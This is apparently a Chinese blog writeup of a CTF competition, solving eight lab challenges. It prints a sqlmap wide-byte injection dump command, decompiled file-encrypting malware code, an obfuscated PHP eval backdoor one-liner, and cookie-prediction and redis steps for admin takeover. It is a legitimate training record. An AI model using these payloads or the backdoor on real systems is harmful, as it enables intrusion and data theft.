cnas能力验证攻防比赛writeup

Writeup

Word count: 4.1kReading time: 24 min

 2019/11/06   Share

前言

周末打了一次cnas的比赛,最终成绩第6,第三题虚拟机没有D盘,没做出来,回来重新建了个虚拟机,一会儿就搞出来了,题目比较简单,以下是所有题目的writeup.

第一题

签到题,查看源代码,通过提示知道有一个www.zip的文件,里面是用户名和密码的字典,控制burp的爆破频率为1秒一次即可.

第二题

宽字节注入

1	sqlmap -u http://172.20.2.19:9002/article.php?id=1 --dbms mysql --prefix "%df%27" -v 3 -D ctf -T secret –dump

第三题

下载文件: http://172.20.2.19:9003/myemail/file.zip

逆向分析改文件,首先该程序会在D盘根目录生成一个RSA.exe

v17 = 0i64;
 v18 = 0i64;
 qword_42078C(&v14, &v16);
 qword_4206DC(v14, *(unsigned int *)(v12 + 4));
 if ( *(_BYTE *)(v14 + 32) )
   qword_4206D4(v14, 32i64);
 qword_42071C(&v14);
 v3 = (void (__fastcall *)(__int64 *))qword_4206BC;
 qword_4206BC(&v13);
 v4 = sub_403F90("D:\\RSA.exe", "wb");
 if ( v4 )
 {
   qword_42070C(&v14);
   qword_4206FC(&v14, v4, 2i64, 0i64);
   v2(&v16, &v14);
   qword_420774(&v14, v12 + *(_QWORD *)(v12 + 16), *(signed int *)(v12 + 4));
   v3(&v14);
   sub_403F98(v4);
   v5 = (void (__fastcall *)(char *))qword_4206B4;
   qword_4206B4(&v16);
   v6 = (__int64 (__fastcall *)(char *))qword_420714;

逆向分析RSA.exe可知该程序关键的加解密函数如下

int __usercall sub_4069F0@<eax>(int a1@<edi>)
{
  sub_406520();                                 // 加密
  if ( rand() % 10000 == 1 )
    sub_406790(a1);                             // 解密
  return 0;
}

加密函数是对D:\flag\*.abcdef进行加密,并生成D:\flag\*.abcdef.encode文件

sub_408000(&Dst, "D:\\flag", 7u);
 LOBYTE(v28) = 6;
 v26 = 0;
 v27 = 15;
 LOBYTE(Memory) = 0;
 sub_408000(&Memory, ".abcdef", 7u);
 Src = 0;
 v16 = 0;
 v17 = 0;
 LOBYTE(v28) = 8;
 sub_404BF0(&Dst, (int)&Memory, (int)&savedregs, (int)&Src);// 文件名
 sub_407C40(&v4, Src);

解密函数是对D:\flag\*.abcdef.encode进行解密

sub_408000(&Dst, "D:\\flag", 7u);
 LOBYTE(v33) = 6;
 v31 = 0;
 v32 = 15;
 LOBYTE(Memory) = 0;
 sub_408000(&Memory, ".abcdef.encode", 0xEu);
 Src = 0;
 v21 = 0;
 v22 = 0;
 LOBYTE(v33) = 8;
 sub_404BF0(&Dst, (int)&Memory, (int)&savedregs, (int)&Src);
 sub_407C40(&v5, Src);
 sub_404FE0((int)&v11, (int)&savedregs, a1, v5, v6, v7, v8, v9, v10);// 解密函数
 sub_407BC0(&Src);
 if ( v32 >= 0x10 )
 {

控制函数跳转

控制函数返回

获得解密后的ascii码 0000666C61677B64646539313833612D333430362D343538662D613830342D3033386333366133656332357D
解密结果flag{dde9183a-3406-458f-a804-038c36a3ec25}

第四题

签到题,struct2直接打,链接:
http://172.20.2.39:8080/showcase.action

第五题

数据库中获取密文:[167, 67, 35, 40, 2, 174, 156, 180, 14, 3, 97, 185, 54, 222, 236, 63]

根据提示,使用sm4解密,由于有100个key,使用脚本批量处理一下

# -*- coding:utf-8 -*-


"""
SM4 GM
"""
import copy

#Expanded SM4 S-boxes    Sbox table: 8bits input convert to 8 bits output
SboxTable = [
0xd6,0x90,0xe9,0xfe,0xcc,0xe1,0x3d,0xb7,0x16,0xb6,0x14,0xc2,0x28,0xfb,0x2c,0x05,
0x2b,0x67,0x9a,0x76,0x2a,0xbe,0x04,0xc3,0xaa,0x44,0x13,0x26,0x49,0x86,0x06,0x99,
0x9c,0x42,0x50,0xf4,0x91,0xef,0x98,0x7a,0x33,0x54,0x0b,0x43,0xed,0xcf,0xac,0x62,
0xe4,0xb3,0x1c,0xa9,0xc9,0x08,0xe8,0x95,0x80,0xdf,0x94,0xfa,0x75,0x8f,0x3f,0xa6,
0x47,0x07,0xa7,0xfc,0xf3,0x73,0x17,0xba,0x83,0x59,0x3c,0x19,0xe6,0x85,0x4f,0xa8,
0x68,0x6b,0x81,0xb2,0x71,0x64,0xda,0x8b,0xf8,0xeb,0x0f,0x4b,0x70,0x56,0x9d,0x35,
0x1e,0x24,0x0e,0x5e,0x63,0x58,0xd1,0xa2,0x25,0x22,0x7c,0x3b,0x01,0x21,0x78,0x87,
0xd4,0x00,0x46,0x57,0x9f,0xd3,0x27,0x52,0x4c,0x36,0x02,0xe7,0xa0,0xc4,0xc8,0x9e,
0xea,0xbf,0x8a,0xd2,0x40,0xc7,0x38,0xb5,0xa3,0xf7,0xf2,0xce,0xf9,0x61,0x15,0xa1,
0xe0,0xae,0x5d,0xa4,0x9b,0x34,0x1a,0x55,0xad,0x93,0x32,0x30,0xf5,0x8c,0xb1,0xe3,
0x1d,0xf6,0xe2,0x2e,0x82,0x66,0xca,0x60,0xc0,0x29,0x23,0xab,0x0d,0x53,0x4e,0x6f,
0xd5,0xdb,0x37,0x45,0xde,0xfd,0x8e,0x2f,0x03,0xff,0x6a,0x72,0x6d,0x6c,0x5b,0x51,
0x8d,0x1b,0xaf,0x92,0xbb,0xdd,0xbc,0x7f,0x11,0xd9,0x5c,0x41,0x1f,0x10,0x5a,0xd8,
0x0a,0xc1,0x31,0x88,0xa5,0xcd,0x7b,0xbd,0x2d,0x74,0xd0,0x12,0xb8,0xe5,0xb4,0xb0,
0x89,0x69,0x97,0x4a,0x0c,0x96,0x77,0x7e,0x65,0xb9,0xf1,0x09,0xc5,0x6e,0xc6,0x84,
0x18,0xf0,0x7d,0xec,0x3a,0xdc,0x4d,0x20,0x79,0xee,0x5f,0x3e,0xd7,0xcb,0x39,0x48,
]

# System parameter
FK = [0xa3b1bac6,0x56aa3350,0x677d9197,0xb27022dc]

# fixed parameter
CK = [
0x00070e15,0x1c232a31,0x383f464d,0x545b6269,
0x70777e85,0x8c939aa1,0xa8afb6bd,0xc4cbd2d9,
0xe0e7eef5,0xfc030a11,0x181f262d,0x343b4249,
0x50575e65,0x6c737a81,0x888f969d,0xa4abb2b9,
0xc0c7ced5,0xdce3eaf1,0xf8ff060d,0x141b2229,
0x30373e45,0x4c535a61,0x686f767d,0x848b9299,
0xa0a7aeb5,0xbcc3cad1,0xd8dfe6ed,0xf4fb0209,
0x10171e25,0x2c333a41,0x484f565d,0x646b7279
]

ENCRYPT = 0
DECRYPT = 1


def GET_UINT32_BE(key_data):
    tmp_data = int((key_data[0] << 24) | (key_data[1] << 16) | (key_data[2] << 8) | (key_data[3]))
    return tmp_data


def PUT_UINT32_BE(n):
    return [int((n>>24)&0xff), int((n>>16)&0xff), int((n>>8)&0xff), int((n)&0xff)]


# rotate shift left marco definition
def SHL(x, n):
    xx = int(int(x << n) & 0xffffffff)
    return xx


def ROTL(x, n):
    xx = SHL(x, n)
    yy = xx | int((x >> (32 - n)) & 0xffffffff)
    return yy


def XOR(a, b):
    return list(map(lambda x, y: x ^ y, a, b))


# look up in SboxTable and get the related value.
# args:    [in] inch: 0x00~0xFF (8 bits unsigned value).
def sm4Sbox(idx):
    return SboxTable[idx]


# Calculating round encryption key.
# args:    [in] a: a is a 32 bits unsigned value;
# return: sk[i]: i{0,1,2,3,...31}.
def sm4CalciRK(ka):
    b = [0, 0, 0, 0]
    a = PUT_UINT32_BE(ka)
    b[0] = sm4Sbox(a[0])
    b[1] = sm4Sbox(a[1])
    b[2] = sm4Sbox(a[2])
    b[3] = sm4Sbox(a[3])
    bb = GET_UINT32_BE(b[0:4])
    rk = bb ^ (ROTL(bb, 13)) ^ (ROTL(bb, 23))
    return rk


# private F(Lt) function:
# "T algorithm" == "L algorithm" + "t algorithm".
# args:    [in] a: a is a 32 bits unsigned value;
# return: c: c is calculated with line algorithm "L" and nonline algorithm "t"
def sm4Lt(ka):
    b = [0, 0, 0, 0]
    a = PUT_UINT32_BE(ka)
    b[0] = sm4Sbox(a[0])
    b[1] = sm4Sbox(a[1])
    b[2] = sm4Sbox(a[2])
    b[3] = sm4Sbox(a[3])
    bb = GET_UINT32_BE(b[0:4])
    c = bb ^ (ROTL(bb, 2)) ^ (ROTL(bb, 10)) ^ (ROTL(bb, 18)) ^ (ROTL(bb, 24))
    return c

# private F function:
# Calculating and getting encryption/decryption contents.
# args:    [in] x0: original contents;
# args:    [in] x1: original contents;
# args:    [in] x2: original contents;
# args:    [in] x3: original contents;
# args:    [in] rk: encryption/decryption key;
# return the contents of encryption/decryption contents.
def sm4F(x0, x1, x2, x3, rk):
    return (x0 ^ sm4Lt(x1 ^ x2 ^ x3 ^ rk))


class Sm4(object):
    def __init__(self):
        self.sk = [0]*32
        self.mode = ENCRYPT

    def sm4_set_key(self, key_data, mode):
        self.sm4_setkey(key_data, mode)

    def sm4_setkey(self, key, mode):
        MK = [0, 0, 0, 0]
        k = [0]*36
        MK[0] = GET_UINT32_BE(key[0:4])
        MK[1] = GET_UINT32_BE(key[4:8])
        MK[2] = GET_UINT32_BE(key[8:12])
        MK[3] = GET_UINT32_BE(key[12:16])
        k[0:4] = XOR(MK[0:4], FK[0:4])
        for i in range(32):
            k[i + 4] = k[i] ^ (sm4CalciRK(k[i + 1] ^ k[i + 2] ^ k[i + 3] ^ CK[i]))
            self.sk[i] = k[i + 4]
        self.mode = mode
        if mode == DECRYPT:
            for idx in range(16):
                t = self.sk[idx]
                self.sk[idx] = self.sk[31 - idx]
                self.sk[31 - idx] = t

    def sm4_one_round(self, sk, in_put):
        out_put = []
        ulbuf = [0]*36
        ulbuf[0] = GET_UINT32_BE(in_put[0:4])
        ulbuf[1] = GET_UINT32_BE(in_put[4:8])
        ulbuf[2] = GET_UINT32_BE(in_put[8:12])
        ulbuf[3] = GET_UINT32_BE(in_put[12:16])
        for idx in range(32):
            ulbuf[idx + 4] = sm4F(ulbuf[idx], ulbuf[idx + 1], ulbuf[idx + 2], ulbuf[idx + 3], sk[idx])

        out_put += PUT_UINT32_BE(ulbuf[35])
        out_put += PUT_UINT32_BE(ulbuf[34])
        out_put += PUT_UINT32_BE(ulbuf[33])
        out_put += PUT_UINT32_BE(ulbuf[32])
        return out_put

    def sm4_crypt_ecb(self, input_data):
        # SM4-ECB block encryption/decryption
        length = len(input_data)
        i = 0
        output_data = []
        while length > 0:
            output_data += self.sm4_one_round(self.sk, input_data[i:i+16])
            i += 16
            length -= 16
        return output_data

    def sm4_crypt_cbc(self, iv, input_data):
        #SM4-CBC buffer encryption/decryption
        length = len(input_data)
        i = 0
        output_data = []
        tmp_input = [0]*16
        if self.mode == ENCRYPT:
            while length > 0:
                tmp_input[0:16] = XOR(input_data[i:i+16], iv[0:16])
                output_data += self.sm4_one_round(self.sk, tmp_input[0:16])
                iv = copy.deepcopy(output_data[i:i+16])
                i += 16
                length -= 16
        else:
            while length > 0:
                output_data += self.sm4_one_round(self.sk, input_data[i:i+16])
                output_data[i:i+16] = XOR(output_data[i:i+16], iv[0:16])
                iv = copy.deepcopy(input_data[i:i + 16])
                i += 16
                length -= 16
        return output_data


def sm4_crypt_ecb(mode, key, data):
    sm4_d = Sm4()
    sm4_d.sm4_set_key(key, mode)
    en_data = sm4_d.sm4_crypt_ecb(data)
    return en_data


def sm4_crypt_cbc(mode, key, iv, data):
    sm4_d = Sm4()
    sm4_d.sm4_set_key(key, mode)
    en_data = sm4_d.sm4_crypt_cbc(iv, data)
    return en_data


def encrypt(key, message):
    sm4_d = Sm4()
    sm4_d.sm4_set_key(key, ENCRYPT)
    cipher = sm4_d.sm4_crypt_ecb(message)
    return cipher

def decrypt(key, cipher):
    sm4_d = Sm4()
    sm4_d.sm4_set_key(key, DECRYPT)
    de_data = sm4_d.sm4_crypt_ecb(cipher)
    message=(''.join(map(chr,de_data)))
    return message
a1=[195, 240, 101, 163, 196, 230, 26, 199, 90, 214, 164, 63, 21, 75, 63, 253, 38, 215, 63, 67, 130, 140, 20, 203, 141, 3, 234, 95, 86, 10, 114, 97, 186, 84, 115, 198, 73, 252, 192, 245, 206, 156, 153, 186, 210, 155, 190, 134, 211, 213, 143, 96, 239, 67, 56, 36, 188, 124, 237, 196, 212, 117, 90, 231, 214, 67, 157, 133, 145, 214, 251, 127, 43, 62, 173, 13, 107, 231, 41, 128, 156, 240, 150, 8, 180, 146, 88, 64, 71, 242, 75, 222, 90, 2, 38, 50, 65, 143, 71, 110, 63, 4, 205, 29, 71, 20, 10, 39, 206, 142, 85, 76, 75, 95, 3, 124, 34, 62, 42, 39, 32, 80, 80, 91, 137, 141, 196, 209, 194, 149, 129, 180, 214, 254, 128, 72, 174, 149, 242, 217, 223, 129, 207, 96, 23, 116, 64, 34, 49, 229, 65, 36, 205, 60, 89, 161, 137, 188, 97, 112, 116, 213, 174, 163, 214, 154, 44, 142, 239, 22, 134, 135, 200, 237, 10, 244, 164, 8, 34, 27, 220, 204, 10, 229, 53, 252, 212, 119, 70, 242, 102, 199, 223, 214, 34, 90, 135, 173, 125, 247, 6, 229, 242, 160, 1, 65, 219, 57, 2, 40, 10, 197, 63, 248, 178, 112, 192, 138, 181, 187, 105, 157, 23, 252, 162, 254, 214, 178, 83, 207, 47, 66, 114, 41, 233, 206, 220, 94, 2, 112, 97, 75, 200, 28, 58, 188, 245, 54, 163, 27, 113, 115, 21, 193, 34, 118, 92, 247, 188, 252, 173, 211, 219, 127, 93, 142, 177, 147, 116, 138, 77, 89, 238, 207, 115, 173, 182, 201, 29, 139, 109, 240, 155, 64, 87, 21, 2, 67, 21, 113, 67, 66, 13, 172, 45, 20, 160, 235, 115, 249, 16, 211, 238, 180, 102, 211, 81, 105, 166, 59, 248, 150, 60, 164, 51, 14, 120, 38, 136, 25, 12, 184, 167, 19, 240, 104, 4, 191, 179, 162, 202, 103, 163, 40, 97, 253, 143, 156, 200, 243, 114, 116, 6, 78, 238, 108, 28, 82, 112, 85, 241, 107, 54, 88, 37, 156, 23, 46, 10, 21, 46, 58, 229, 18, 226, 164, 138, 169, 113, 1, 8, 157, 209, 62, 180, 210, 189, 20, 217, 175, 149, 156, 156, 129, 213, 235, 201, 108, 208, 109, 210, 96, 129, 76, 126, 202, 203, 46, 184, 210, 226, 252, 29, 246, 245, 57, 160, 129, 167, 226, 171, 136, 179, 17, 102, 4, 210, 1, 193, 5, 98, 197, 212, 190, 246, 103, 147, 22, 8, 83, 88, 228, 113, 83, 102, 163, 207, 157, 11, 42, 82, 21, 97, 31, 241, 103, 143, 217, 182, 168, 65, 253, 159, 182, 221, 41, 98, 207, 216, 252, 8, 64, 172, 53, 94, 169, 14, 81, 2, 104, 141, 210, 3, 27, 192, 31, 180, 253, 89, 88, 219, 119, 120, 40, 144, 184, 3, 210, 204, 39, 144, 66, 115, 77, 192, 247, 88, 5, 108, 134, 0, 4, 196, 108, 39, 44, 148, 64, 139, 48, 161, 142, 92, 226, 77, 15, 94, 136, 240, 43, 54, 42, 7, 241, 200, 57, 92, 213, 40, 32, 38, 89, 147, 251, 37, 115, 53, 25, 241, 144, 181, 44, 227, 216, 90, 15, 109, 249, 49, 129, 199, 190, 226, 159, 210, 137, 15, 184, 14, 123, 185, 201, 190, 14, 243, 214, 244, 179, 141, 10, 3, 43, 51, 103, 8, 239, 154, 158, 59, 224, 85, 64, 120, 46, 207, 33, 103, 215, 186, 80, 113, 232, 45, 17, 87, 163, 92, 108, 219, 45, 239, 109, 4, 93, 131, 104, 105, 11, 247, 101, 205, 168, 202, 255, 46, 237, 68, 3, 220, 35, 210, 210, 187, 64, 18, 239, 8, 84, 162, 47, 73, 240, 12, 35, 165, 146, 93, 108, 203, 242, 68, 214, 254, 97, 43, 190, 204, 100, 65, 103, 174, 249, 191, 121, 39, 233, 196, 173, 78, 119, 116, 125, 143, 117, 126, 55, 212, 173, 117, 116, 38, 126, 209, 41, 251, 39, 10, 211, 195, 124, 80, 17, 196, 79, 74, 203, 3, 246, 182, 136, 246, 192, 210, 175, 37, 108, 109, 224, 170, 46, 85, 174, 160, 48, 87, 79, 188, 17, 55, 5, 88, 17, 34, 185, 65, 215, 169, 82, 222, 91, 12, 169, 146, 207, 1, 172, 48, 27, 122, 121, 98, 182, 30, 141, 25, 196, 107, 107, 90, 112, 91, 99, 41, 217, 73, 44, 205, 189, 159, 142, 135, 153, 159, 96, 64, 60, 165, 110, 31, 244, 226, 47, 19, 115, 98, 195, 251, 194, 86, 129, 112, 25, 174, 162, 160, 38, 190, 118, 213, 168, 68, 43, 229, 213, 31, 210, 44, 105, 153, 165, 119, 141, 157, 237, 31, 35, 72, 107, 232, 2, 89, 245, 98, 119, 155, 238, 215, 49, 118, 80, 132, 152, 13, 103, 24, 200, 54, 59, 4, 185, 213, 43, 205, 114, 6, 164, 36, 44, 47, 159, 151, 104, 209, 149, 43, 65, 27, 70, 216, 181, 251, 5, 208, 142, 207, 168, 232, 215, 189, 85, 10, 11, 23, 223, 210, 184, 110, 191, 84, 67, 202, 161, 174, 227, 92, 156, 22, 222, 218, 16, 171, 107, 242, 202, 122, 45, 50, 250, 73, 2, 186, 205, 242, 113, 78, 52, 252, 120, 92, 215, 183, 140, 64, 104, 181, 37, 37, 254, 31, 178, 61, 45, 11, 225, 97, 65, 24, 139, 34, 135, 92, 127, 210, 108, 205, 215, 79, 1, 215, 158, 126, 71, 108, 218, 206, 85, 78, 181, 0, 52, 44, 25, 57, 120, 191, 34, 17, 140, 203, 193, 77, 13, 150, 228, 60, 247, 219, 38, 253, 174, 44, 26, 20, 114, 248, 36, 79, 147, 48, 55, 39, 182, 95, 202, 72, 254, 148, 209, 45, 113, 103, 238, 9, 153, 227, 205, 85, 25, 85, 91, 85, 20, 1, 64, 146, 223, 246, 2, 177, 105, 199, 112, 248, 73, 11, 215, 140, 249, 179, 44, 209, 86, 154, 10, 210, 183, 39, 171, 39, 2, 63, 41, 120, 116, 65, 241, 133, 72, 175, 228, 1, 96, 229, 5, 79, 2, 188, 125, 24, 76, 251, 39, 200, 214, 134, 191, 11, 131, 233, 141, 79, 87, 234, 152, 174, 30, 115, 97, 109, 95, 248, 143, 214, 239, 213, 166, 92, 253, 99, 118, 98, 70, 247, 69, 183, 250, 158, 37, 228, 10, 68, 211, 64, 37, 237, 127, 231, 5, 239, 63, 209, 72, 116, 119, 77, 69, 235, 249, 72, 127, 31, 123, 118, 157, 18, 9, 41, 58, 29, 104, 5, 10, 143, 144, 11, 37, 88, 251, 36, 77, 49, 10, 116, 11, 35, 161, 104, 49, 252, 36, 242, 215, 104, 167, 150, 227, 42, 235, 122, 191, 122, 16, 166, 162, 197, 13, 109, 15, 172, 33, 51, 230, 33, 104, 250, 4, 253, 185, 218, 251, 35, 233, 4, 246, 161, 28, 112, 203, 75, 123, 217, 32, 85, 164, 242, 14, 59, 246, 191, 158, 242, 138, 82, 17, 114, 128, 35, 52, 4, 239, 162, 125, 12, 125, 129, 26, 144, 112, 200, 156, 10, 71, 97, 93, 161, 84, 26, 32, 6, 152, 17, 174, 244, 143, 80, 115, 105, 61, 80, 212, 76, 247, 191, 52, 133, 219, 6, 90, 135, 80, 160, 39, 251, 114, 10, 96, 36, 100, 240, 201, 8, 181, 39, 66, 150, 19, 26, 86, 245, 247, 93, 142, 77, 226, 141, 217, 222, 250, 101, 87, 159, 201, 145, 106, 218, 79, 11, 133, 26, 191, 233, 158, 132, 79, 157, 138, 156, 232, 144, 115, 158, 7, 17, 167, 5, 102, 0, 3, 49, 128, 229, 128, 69, 24, 62, 1, 59, 146, 12, 152, 206, 16, 242, 209, 114, 79, 238, 175, 226, 73, 116, 164, 13, 210, 134, 116, 71, 225, 58, 242, 25, 227, 120, 93, 125, 10, 64, 2, 72, 56, 59, 38, 52, 211, 20, 142, 19, 197, 5, 151, 142, 232, 137, 186, 200, 126, 6, 216, 24, 255, 99, 73, 18, 199, 35, 88, 13, 240, 100, 84, 234, 12, 50, 104, 196, 122, 218, 132, 1, 67, 188, 116, 189, 153, 129, 255, 65, 143, 111, 186, 127, 29, 60, 203, 89, 238, 176, 91, 40, 108, 230, 241, 52, 66, 23, 233, 239, 246, 93, 86, 132, 192, 41, 2, 9, 233, 239, 35, 22, 32, 104, 248, 160, 153, 113, 186, 213, 195, 224, 211, 119, 170, 130, 203, 0, 24, 255, 30, 176, 164, 123, 55, 33, 206, 249, 122, 2, 155, 220, 237, 152, 11, 9, 152, 172, 171, 77, 139, 70, 206, 197, 153, 127, 58, 87, 188, 160, 138, 43, 123, 169, 2, 214, 96, 229, 166, 153, 61, 83, 121, 238, 130, 243, 63, 237, 45, 208, 53, 96, 133, 6, 135, 207, 95, 79, 131, 38, 59, 233, 91, 87, 181, 90, 32, 2, 216, 208, 68, 188, 15, 160, 126, 182, 193, 123, 178, 252, 57, 62, 129, 81, 42, 204, 175, 211, 17, 197, 18, 240, 41, 82, 244, 201, 190, 87, 189, 234, 56, 26, 239, 55, 64, 82, 21, 158, 121, 210, 80, 58, 177, 122, 134, 151, 29, 225, 173, 37, 112, 85, 67, 62, 102, 73, 61, 69, 22, 209, 254, 137, 65, 86, 120, 9, 222, 91, 48, 24, 138, 135, 152, 96, 246, 126, 175, 39, 102, 197, 41, 236, 130, 159, 56, 198, 251, 69, 166, 172, 156, 240, 149, 204, 162, 211, 150, 76, 79, 158, 38, 153, 55, 20, 94, 62, 121, 218, 55, 183, 180, 45, 249]
if __name__ == "__main__":
 #   key = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
    message = [115, 109, 52, 32, 116, 101, 115, 116, 48, 49, 50, 51, 52, 53, 54, 55]
 #   cipher = [5, 28, 162, 46, 247, 9, 152, 32, 180, 19, 86, 178, 8, 103, 31, 167]
    cipher=[167, 67, 35, 40, 2, 174, 156, 180, 14, 3, 97, 185, 54, 222, 236, 63]

    assert len(message)%16==0
   # print a1
    for i in range(0,len(a1),16):

        s=[]
        for j in range(16):
            s.append(a1[i+j])
        print decrypt(s,cipher)
#        print decrypt('l'+str(i),cipher)
#    print encrypt(key,message)
#    print decrypt(key,cipher)

获得的明文为SM4_0c62148892ee
使用sm3计算hash

#coding:utf-8
#杂凑算法，非对称加密
import struct 

IV="7380166f 4914b2b9 172442d7 da8a0600 a96f30bc 163138aa e38dee4d b0fb0e4e" 
IV = int(IV.replace(" ", ""), 16) 
a = [] 
for i in range(0, 8): 
        a.append(0) 
        a[i] = (IV >> ((7 - i) * 32)) & 0xFFFFFFFF 
IV = a 

def out_hex(list1): 
        for i in list1: 
                print "%08x" % i, 
        print "\n", 

def rotate_left(a, k): 
        k = k % 32 
        return ((a << k) & 0xFFFFFFFF) | ((a & 0xFFFFFFFF) >> (32 - k)) 

T_j = [] 
for i in range(0, 16): 
        T_j.append(0) 
        T_j[i] = 0x79cc4519 
for i in range(16, 64): 
        T_j.append(0) 
        T_j[i] = 0x7a879d8a 

def FF_j(X, Y, Z, j): 
        if 0 <= j and j < 16: 
                ret = X ^ Y ^ Z 
        elif 16 <= j and j < 64: 
                ret = (X & Y) | (X & Z) | (Y & Z) 
        return ret 

def GG_j(X, Y, Z, j): 
        if 0 <= j and j < 16: 
                ret = X ^ Y ^ Z 
        elif 16 <= j and j < 64: 
                #ret = (X | Y) & ((2 ** 32 - 1 - X) | Z) 
                ret = (X & Y) | ((~ X) & Z) 
        return ret 

def P_0(X): 
        return X ^ (rotate_left(X, 9)) ^ (rotate_left(X, 17)) 

def P_1(X): 
        return X ^ (rotate_left(X, 15)) ^ (rotate_left(X, 23)) 

def CF(V_i, B_i): 
        W = [] 
        for j in range(0, 16): 
                W.append(0) 
                unpack_list = struct.unpack(">I", B_i[j*4:(j+1)*4]) 
                W[j] = unpack_list[0] 
        for j in range(16, 68): 
                W.append(0) 
                W[j] = P_1(W[j-16] ^ W[j-9] ^ (rotate_left(W[j-3], 15))) ^ (rotate_left(W[j-13], 7)) ^ W[j-6] 
                str1 = "%08x" % W[j] 
        W_1 = [] 
        for j in range(0, 64): 
                W_1.append(0) 
                W_1[j] = W[j] ^ W[j+4] 
                str1 = "%08x" % W_1[j] 

        A, B, C, D, E, F, G, H = V_i 
        """ 
        print "00", 
        out_hex([A, B, C, D, E, F, G, H]) 
        """ 
        for j in range(0, 64): 
                SS1 = rotate_left(((rotate_left(A, 12)) + E + (rotate_left(T_j[j], j))) & 0xFFFFFFFF, 7) 
                SS2 = SS1 ^ (rotate_left(A, 12)) 
                TT1 = (FF_j(A, B, C, j) + D + SS2 + W_1[j]) & 0xFFFFFFFF 
                TT2 = (GG_j(E, F, G, j) + H + SS1 + W[j]) & 0xFFFFFFFF 
                D = C 
                C = rotate_left(B, 9) 
                B = A 
                A = TT1 
                H = G 
                G = rotate_left(F, 19) 
                F = E 
                E = P_0(TT2) 

                A = A & 0xFFFFFFFF 
                B = B & 0xFFFFFFFF 
                C = C & 0xFFFFFFFF 
                D = D & 0xFFFFFFFF 
                E = E & 0xFFFFFFFF 
                F = F & 0xFFFFFFFF 
                G = G & 0xFFFFFFFF 
                H = H & 0xFFFFFFFF 
                """ 
                str1 = "%02d" % j 
                if str1[0] == "0": 
                        str1 = ' ' + str1[1:] 
                print str1, 
                out_hex([A, B, C, D, E, F, G, H]) 
                """ 

        V_i_1 = [] 
        V_i_1.append(A ^ V_i[0]) 
        V_i_1.append(B ^ V_i[1]) 
        V_i_1.append(C ^ V_i[2]) 
        V_i_1.append(D ^ V_i[3]) 
        V_i_1.append(E ^ V_i[4]) 
        V_i_1.append(F ^ V_i[5]) 
        V_i_1.append(G ^ V_i[6]) 
        V_i_1.append(H ^ V_i[7]) 
        return V_i_1 

def hash_msg(msg): 
        len1 = len(msg) 
        reserve1 = len1 % 64 
        msg = msg + chr(0x80) 
        reserve1 = reserve1 + 1 
        for i in range(reserve1, 56): 
                msg = msg + chr(0x00) 

        bit_length = (len1) * 8 
        bit_length_string = struct.pack(">Q", bit_length) 
        msg = msg + bit_length_string 

        #print len(msg) 
        group_count = len(msg) / 64 

        m_1 = B = [] 
        for i in range(0, group_count): 
                B.append(0) 
                B[i] = msg[i*64:(i+1)*64] 

        V = [] 
        V.append(0) 
        V[0] = IV 
        for i in range(0, group_count): 
                V.append(0) 
                V[i+1] = CF(V[i], B[i]) 

        return V[i+1] 

print "abc" 
y = hash_msg("SM4_0c62148892ee") 
print "result: ", 
print '----'
#print y
out_hex(y) 

'''
print "abcd" * 16 
y = hash_msg("abcd" * 16) 
print "result: ", 
out_hex(y)
'''

第六题

下载源码,后门文件如下

1	<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?>

phpinfo查了一下可执行函数都被禁掉了,通过file_get_contents('/flag')可以获得flag

第七题

不停的注册跟admin类似的账号,观察cookie中的PHPLOG字段的变化规律,预测出admin用户的cookie为PHPLOG=TRMoVRz7,然后重置管理员的账号密码获得flag

第八题

服务器有弱口令test:test,通过修改数据包返回一个xcloud:xcloud13e7的服务器的账号密码,登录后发现存在redis,但是大部分命令被禁掉了.

使用

1	redis-cli --scan -a g00djob

扫描到一个key, 查看这个键值对获得flag

Next Post

巅峰极客逆向之flodb分析
Previous Post

通过bytectf学习新的姿势

CATALOG

1. 前言



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true